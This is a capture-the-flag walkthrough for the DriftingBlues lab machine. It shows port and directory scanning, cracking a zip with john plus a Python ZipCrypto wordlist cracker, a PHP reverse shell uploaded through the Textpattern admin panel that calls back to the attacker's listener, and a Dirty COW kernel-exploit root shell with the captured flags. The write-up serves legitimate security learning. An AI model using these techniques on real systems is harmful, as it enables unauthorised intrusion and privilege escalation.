Information gathering
Host discovery
arp-scan -l
(lists the live hosts on the local subnet; the target is 192.168.254.133)
Port scan
┌──(root㉿kali)-[~/blue6]
└─# nmap -sV -p- 192.168.254.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 04:25 EDT
Nmap scan report for 192.168.254.133
Host is up (0.00021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
MAC Address: 08:00:27:C8:A6:E8 (Oracle VirtualBox virtual NIC)
Directory scan
┌──(root㉿kali)-[/home/kali/Desktop]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x php,txt,jpg,html,txt,zip -u http://192.168.254.133
===============================================================
/db (Status: 200) [Size: 53656]
/index (Status: 200) [Size: 750]
/index.html (Status: 200) [Size: 750]
/robots (Status: 200) [Size: 110]
/robots.txt (Status: 200) [Size: 110]
/spammer (Status: 200) [Size: 179]
/spammer.zip (Status: 200) [Size: 179]
Port 80
robots.txt lists a path; visiting it shows a login page, which is the Textpattern CMS admin panel:
http://192.168.254.133/textpattern/textpattern/
We have no password for it, but the spammer.zip found by the directory scan has not been looked at yet, so download it and see what is inside.
┌──(root㉿kali)-[~/blue6]
└─# curl http://192.168.254.133/spammer.zip -o 1.zip
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 179 100 179 0 0 77927 0 --:--:-- --:--:-- --:--:-- 89500
The archive is password-protected, so convert it with zip2john and crack it with john against rockyou.txt:
┌──(root㉿kali)-[~/blue6]
└─# zip2john 1.zip > hash
ver 2.0 1.zip/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D ts=ADCB cs=b003 type=0
┌──(root㉿kali)-[~/blue6]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4 (1.zip/creds.txt)
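To show what zip2john and john are doing under the hood, here is an added example (not from the original writeup or from john's code) that implements the traditional PKZIP "ZipCrypto" stream cipher and runs a wordlist attack with the same two-stage check john uses: the last byte of the decrypted 12-byte encryption header must equal the high byte of the stored CRC (compare cs=b003 with crc=B003611D in the zip2john line above), which throws away 255 out of 256 wrong guesses after a dozen byte operations, and only then is the data decrypted and its CRC verified. The zip entry is constructed inside the script: the plaintext mayer:lionheart and password myspace4 are the values from this box, the 11 filler bytes of the header are fixed instead of random so the run is deterministic, and the small wordlist is a stand-in for rockyou.txt. With a "stored" (type=0) entry the ciphertext is 12 + 15 = 27 bytes, matching cmplen=27 / decmplen=15 reported by zip2john.

```python
import zlib

# Traditional PKZIP "ZipCrypto" stream cipher (APPNOTE section 6.1).
# Three 32-bit keys are seeded from the password; every plaintext byte
# processed feeds back into the keys, so the key stream is data-dependent.
_POLY = 0xEDB88320
_CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ _POLY if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc32_byte(crc, b):
    return _CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, b):
        self.k0 = _crc32_byte(self.k0, b)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_byte(self.k2, self.k1 >> 24)

    def _stream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._stream_byte())
            self._update(p)  # keys advance on the plaintext byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._stream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def make_stored_entry(password: bytes, plaintext: bytes):
    """Build the encrypted payload of a 'stored' (type=0) zip entry:
    a 12-byte encryption header (11 filler bytes + CRC high byte as the
    check byte) followed by the data. Returns (ciphertext, crc32).
    A real archiver uses random filler; fixed filler keeps this deterministic."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = b"\x00" * 11 + bytes([crc >> 24])
    return ZipCrypto(password).encrypt(header + plaintext), crc


def crack(ciphertext: bytes, crc: int, wordlist):
    """Wordlist attack using the same two-stage check john applies."""
    enc_header, body = ciphertext[:12], ciphertext[12:]
    for pw in wordlist:
        z = ZipCrypto(pw)
        # Stage 1: decrypt only the header; its last byte must equal the
        # CRC high byte. This rejects 255/256 of wrong passwords cheaply.
        if z.decrypt(enc_header)[-1] != crc >> 24:
            continue
        # Stage 2: the key stream continues into the data; verify the full CRC.
        if zlib.crc32(z.decrypt(body)) & 0xFFFFFFFF == crc:
            return pw
    return None


# Constructed sample: the creds.txt content and password seen on this box,
# plus a tiny stand-in for rockyou.txt.
SAMPLE_PLAINTEXT = b"mayer:lionheart"
SAMPLE_CIPHERTEXT, SAMPLE_CRC = make_stored_entry(b"myspace4", SAMPLE_PLAINTEXT)
SAMPLE_WORDLIST = [b"123456", b"password", b"lionheart", b"iloveyou", b"myspace4", b"qwerty"]

if __name__ == "__main__":
    print(crack(SAMPLE_CIPHERTEXT, SAMPLE_CRC, SAMPLE_WORDLIST))
```

The cheap header check is why ZipCrypto archives fall to rockyou.txt in seconds even on a laptop; archives encrypted with WinZip/7-Zip AES give no such shortcut and need a full key derivation per guess.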
Extracting the archive gives a username and password. They are not SSH credentials (SSH is not even open; the port scan found only port 80), so they must be for the Textpattern login:
┌──(root㉿kali)-[~/blue6]
└─# cat creds.txt
mayer:lionheart
Getting a shell
After logging into Textpattern there is a file upload function, so we upload a PHP reverse shell (the payload generation is shown in a screenshot in the original post). Start a listener first, upload the file, then request the uploaded file in the browser so the web server executes it; the uname/w/id banner below is printed by the reverse shell's startup commands when it connects back. This relies on the upload directory being served by Apache with PHP execution enabled; if uploads were stored outside the web root or served with PHP disabled, the file would never run.
nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.254.205] from (UNKNOWN) [192.168.254.133] 46571
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
03:47:05 up 22 min, 0 users, load average: 0.00, 3.86, 9.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
Privilege escalation
With a shell as www-data, a look around shows no regular users at all (nothing under /home), so there is nobody to pivot to; time for the usual privesc checklist:
- sudo -l: nothing (www-data has no sudo rights)
- cat /etc/crontab: nothing of interest
- find / -perm -u=s -type f 2>/dev/null: no unusual SUID binaries
- /usr/sbin/getcap -r / 2>/dev/null: no file capabilities (getcap needs a starting path, hence the /)
- find / -writable -type f 2>/dev/null: nothing useful (expect a lot of /proc noise)
- uname -a
None of that yielded anything usable, so we pulled down linpeas.sh and pspy64. linpeas flagged a key file, but it did not seem to lead anywhere, and in the end I had to look at another writeup, which said to use a kernel exploit (it has been a while since a box needed one). The kernel is 3.2.0-4-amd64 (Debian 3.2.78-1), a 2016 build, and judging by the cowroot binary name and the uid-0 user "firefart" it creates, the exploit used below is firefart's Dirty COW (CVE-2016-5195) PoC.
One pitfall to avoid: the exploit has to be compiled with the target's own gcc. A binary built on a current Kali is linked against a far newer glibc than this Debian 7 box has, so it fails at load time with a GLIBC version error. Either compile on the target (it has gcc, as shown below) or build a statically linked binary on an old enough toolchain. Also note that firefart's PoC backs up /etc/passwd to /tmp/passwd.bak before overwriting it; restore it once you are done, and run the race once rather than repeatedly, since a Dirty COW race can leave the kernel unstable.
www-data@driftingblues:/tmp$ gcc 2.c -o cowroot -pthread
gcc 2.c -o cowroot -pthread
www-data@driftingblues:/tmp$ ls
ls
1.c
2.c
cowroot
www-data@driftingblues:/tmp$ ./cowroot
./cowroot
id
uid=0(firefart) gid=33(www-data) groups=0(root),33(www-data)
whoami
firefart
cd /root
ls
root.txt
user.txt
cat root.txt
CCAD89B795EE7BCF7BBAD5A46F40F488
cat user.txt
5355B03AF00225CFB210AE9CA8931E51
Both root.txt and user.txt recovered. A fun box.
Key takeaways
- Cracking a password-protected zip (zip2john + john)
- File upload to reverse shell
- Kernel exploit privilege escalation (Dirty COW)